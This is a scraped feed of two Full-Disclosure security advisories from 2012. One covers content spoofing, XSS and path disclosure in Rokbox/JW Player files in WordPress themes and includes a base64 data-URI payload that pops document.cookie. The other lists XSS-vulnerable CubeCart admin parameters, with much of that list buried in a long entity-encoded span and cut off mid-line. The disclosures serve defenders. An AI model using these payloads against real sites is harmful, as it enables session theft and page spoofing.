[<a href="http://site/wordpress/wp-content/themes/rt_affinity_wp/js/rokbox/jwplayer/jwplayer.swf"  rel="nofollow">site</a>]<br />
<br />
[<a href="http://site/wordpress/wp-content/themes/rt_nexus_wp/js/rokbox/jwplayer/jwplayer.swf"  rel="nofollow">site</a>]<br />
<br />
[<a href="http://site/wordpress/wp-content/themes/rt_sentinel/js/rokbox/jwplayer/jwplayer.swf"  rel="nofollow">site</a>]<br />
<br />
[<a href="http://site/wordpress/wp-content/themes/rt_mynxx_wp_vestnikp/js/rokbox/jwplayer/jwplayer.swf"  rel="nofollow">site</a>]<br />
<br />
[<a href="http://site/wordpress/wp-content/themes/rt_mynxx_wp/js/rokbox/jwplayer/jwplayer.swf"  rel="nofollow">site</a>]<br />
[<a href="http://site/wordpress/wp-content/themes/rt.mynxx.wp/js/rokbox/jwplayer/jwplayer.swf"  rel="nofollow">site</a>]<br />
<br />
[<a href="http://site/wordpress/wp-content/themes/rt_moxy_wp/js/rokbox/jwplayer/jwplayer.swf"  rel="nofollow">site</a>]<br />
<br />
[<a href="http://site/wordpress/wp-content/themes/rt_terrantribune_wp/js/rokbox/jwplayer/jwplayer.swf"  rel="nofollow">site</a>]<br />
<br />
[<a href="http://site/wordpress/wp-content/themes/rt_meridian_wp/js/rokbox/jwplayer/jwplayer.swf"  rel="nofollow">site</a>]<br />
<br />
Content Spoofing (WASC-12):<br />
<br />
In parameter file there can be set as video, as audio files.<br />
<br />
Swf-file of JW Player accepts arbitrary addresses in parameters file and <br />
image, which allows to spoof content of flash - i.e. by setting addresses of <br />
video (audio) and/or image files from other site.<br />
<br />
[<a href="http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&amp;backcolor=0xFFFFFF&amp;screencolor=0xFFFFFF"  rel="nofollow">site</a>]<br />
[<a href="http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&amp;image=1.jpg"  rel="nofollow">site</a>]<br />
<br />
Content Spoofing (WASC-12):<br />
<br />
Swf-file of JW Player accepts arbitrary addresses in parameter config, which <br />
allows to spoof content of flash - i.e. by setting address of config file <br />
from other site (parameters file and image in xml-file accept arbitrary <br />
addresses). For loading of config file from other site it needs to have <br />
crossdomain.xml.<br />
<br />
[<a href="http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?config=1.xml"  rel="nofollow">site</a>]<br />
<br />
1.xml<br />
<br />
&lt;config&gt;<br />
  &lt;file&gt;1.flv&lt;/file&gt;<br />
  &lt;image&gt;1.jpg&lt;/image&gt;<br />
&lt;/config&gt;<br />
<br />
Content Spoofing (WASC-12):<br />
<br />
[<a href="http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&amp;aboutlink=http://site"  rel="nofollow">site</a>]<br />
<br />
XSS (WASC-08):<br />
<br />
[<a href="http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&amp;aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B"  rel="nofollow">site</a>]<br />
<br />
Full path disclosure (WASC-13):<br />
<br />
In all these themes there is FPD in index.php <br />
(http://site/wordpress/wp-content/themes/rt_afterburner_wp/ and the same for <br />
other themes), which works at default PHP settings. Also potentially there <br />
are FPD in other php-files of these themes.<br />
<br />
Information Leakage (WASC-13):<br />
<br />
There are sites with rt_mixxmag_wp theme, which have error log with full <br />
paths.<br />
<br />
[<a href="http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log"  rel="nofollow">site</a>]<br />
<br />
------------<br />
Timeline:<br />
------------ <br />
<br />
2012.05.29 - informed developers of JW Player.<br />
2012.06.06 - disclosed at my site about JW Player.<br />
2012.08.18 - informed developers about new holes in JW Player Pro.<br />
2012.08.23 - disclosed at my site about JW Player Pro.<br />
2012.08.28 - informed developers of Rokbox.<br />
2012.12.14 - disclosed at my site about Rokbox.<br />
2012.12.23 - disclosed to the lists about multiple themes for WordPress with <br />
Rokbox.<br />
<br />
Best wishes &amp; regards,<br />
MustLive<br />
Administrator of Websecurity web site<br />
[<a href="http://websecurity.com.ua"  rel="nofollow">websecurity.com.ua</a>] <br />
<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>MustLive</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Sun, 23 Dec 2012 07:45:02 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1693505,1693505#msg-1693505</guid>
            <title>[Full-disclosure] CubeCart 3.0.20 (3.0.x) and lower | Multiple Cross Site Scripting Vulnerabilities (no replies)</title>
            <link>http://choon.net/forum/read.php?23,1693505,1693505#msg-1693505</link>
            <description><![CDATA[ 1. OVERVIEW<br />
<br />
CubeCart 3.0.20 and lower versions are vulnerable to Cross Site Scripting.<br />
<br />
<br />
2. BACKGROUND<br />
<br />
CubeCart is an &quot;out of the box&quot; ecommerce shopping cart software<br />
solution which has been written to run on servers that have PHP &amp;<br />
MySQL support. With CubeCart you can quickly setup a powerful online<br />
store which can be used to sell digital or tangible products to new<br />
and existing customers all over the world.<br />
<br />
<br />
3. VULNERABILITY DESCRIPTION<br />
<br />
Multiple parameters are not properly sanitized, which allows attacker<br />
to conduct Cross Site Scripting attack. This may allow an attacker to<br />
create a specially crafted URL that would execute arbitrary script<br />
code in a victim's browser.<br />
<br />
<br />
4. VERSIONS AFFECTED<br />
<br />
3.0.20 and lower (aka 3.0.x family)<br />
<br />
<br />
5. Affected URLs and Parameters<br />
<br />
/admin/adminusers/permissions.php 	(adminId parameter)<br />
/admin/categories/index.php 	(cat_name parameter)<br />
/admin/categories/languages.php 	(cat_master_id parameter)<br />
/admin/customers/ 	(searchStr parameter)<br />
/admin/customers/index.php 	(add_1 parameter)<br />
/admin/customers/index.php 	(add_2 parameter)<br />
/admin/customers/index.php 	(county parameter)<br />
/admin/customers/index.php 	(email parameter)<br />
/admin/customers/index.php 	(firstName parameter)<br />
/admin/customers/index.php 	(lastName parameter)<br />
/admin/customers/index.php 	(searchStr parameter)<br />
/admin/customers/index.php 	(town parameter)<br />
/admin/docs/home.php 	(homeLang parameter)<br />
/admin/docs/home.php 	(title parameter)<br />
/admin/docs/languages.php 	(doc_master_id parameter)<br />
/admin/docs/siteDocs.php	(FCKeditor parameter)<br />
/admin/filemanager/upload.php 	(filename multipart parameter attribute)<br />
/admin/index.php 	(User-Agent HTTP header)<br />
/admin/modules/affiliate/clixGalore/index.php 	(folder parameter)<br />
/admin/modules/affiliate/clixGalore/index.php 	(module parameter)<br />
/admin/modules/affiliate/iDevAffiliate/index.php 	(folder parameter)<br />
/admin/modules/affiliate/iDevAffiliate/index.php 	(module parameter)<br />
/admin/modules/affiliate/JROX/index.php 	(folder parameter)<br />
/admin/modules/affiliate/JROX/index.php 	(module parameter)<br />
/admin/modules/affiliate/tradeDoubler/index.php 	(folder parameter)<br />
/admin/modules/affiliate/tradeDoubler/index.php 	(module parameter)<br />
/admin/modules/gateway/2Checkout/index.php 	(folder parameter)<br />
/admin/modules/gateway/2Checkout/index.php 	(module parameter)<br />
/admin/modules/gateway/AsianPay/index.php 	(folder parameter)<br />
/admin/modules/gateway/AsianPay/index.php 	(module parameter)<br />
/admin/modules/gateway/AsianPay/index.php 	(module[account_id]parameter)<br />
/admin/modules/gateway/AsianPay/index.php 	(module[desc] parameter)<br />
/admin/modules/gateway/AsianPay/index.php 	(module<a href="mailto:&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#65;&#115;&#105;&#97;&#110;&#80;&#97;&#121;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#91;&#114;&#101;&#99;&#101;&#105;&#118;&#101;&#114;&#105;&#100;&#93;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#65;&#117;&#116;&#104;&#111;&#114;&#105;&#122;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#65;&#117;&#116;&#104;&#111;&#114;&#105;&#122;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#65;&#117;&#116;&#104;&#111;&#114;&#105;&#122;&#101;&#95;&#65;&#73;&#77;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#65;&#117;&#116;&#104;&#111;&#114;&#105;&#122;&#101;&#95;&#65;&#73;&#77;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#66;&#108;&#117;&#101;&#80;&#97;&#121;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#66;&#108;&#117;&#101;&#80;&#97;&#121;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#99;&#99;&#65;&#118;&#101;&#110;&#117;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#99;&#99;&#65;&#118;&#101;&#110;&#117;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#99;&#99;&#78;&#111;&#119;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#99;&#99;&#78;&#111;&#119;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#67;&#104;&#114;&#111;&#110;&#111;&#112;&#97;&#121;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#67;&#104;&#114;&#111;&#110;&#111;&#112;&#97;&#121;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#101;&#71;&#111;&#108;&#100;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#101;&#71;&#111;&#108;&#100;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#101;&#87;&#97;&#121;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#101;&#87;&#97;&#121;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#72;&#83;&#66;&#67;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#72;&#83;&#66;&#67;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#76;&#105;&#110;&#107;&#80;&#111;&#105;&#110;&#116;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#76;&#105;&#110;&#107;&#80;&#111;&#105;&#110;&#116;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#109;&#97;&#108;&#115;&#45;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#109;&#97;&#108;&#115;&#45;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#109;&#111;&#110;&#101;&#121;&#98;&#111;&#111;&#107;&#101;&#114;&#115;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#109;&#111;&#110;&#101;&#121;&#98;&#111;&#111;&#107;&#101;&#114;&#115;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#78;&#79;&#67;&#72;&#69;&#88;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#78;&#79;&#67;&#72;&#69;&#88;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#78;&#111;&#99;&#104;&#101;&#120;&#95;&#65;&#80;&#67;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#78;&#111;&#99;&#104;&#101;&#120;&#95;&#65;&#80;&#67;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#80;&#97;&#121;&#74;&#117;&#110;&#99;&#116;&#105;&#111;&#110;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#80;&#97;&#121;&#74;&#117;&#110;&#99;&#116;&#105;&#111;&#110;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#112;&#97;&#121;&#109;&#97;&#116;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#112;&#97;&#121;&#109;&#97;&#116;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#80;&#97;&#121;&#79;&#102;&#102;&#108;&#105;&#110;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#80;&#97;&#121;&#79;&#102;&#102;&#108;&#105;&#110;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#80;&#97;&#121;&#80;&#97;&#108;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#80;&#97;&#121;&#80;&#97;&#108;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#80;&#114;&#105;&#110;&#116;&#95;&#79;&#114;&#100;&#101;&#114;&#95;&#70;&#111;&#114;&#109;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#80;&#114;&#105;&#110;&#116;&#95;&#79;&#114;&#100;&#101;&#114;&#95;&#70;&#111;&#114;&#109;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#80;&#114;&#111;&#116;&#120;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#80;&#114;&#111;&#116;&#120;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#112;&#115;&#105;&#71;&#97;&#116;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#112;&#115;&#105;&#71;&#97;&#116;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#83;&#69;&#67;&#80;&#97;&#121;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;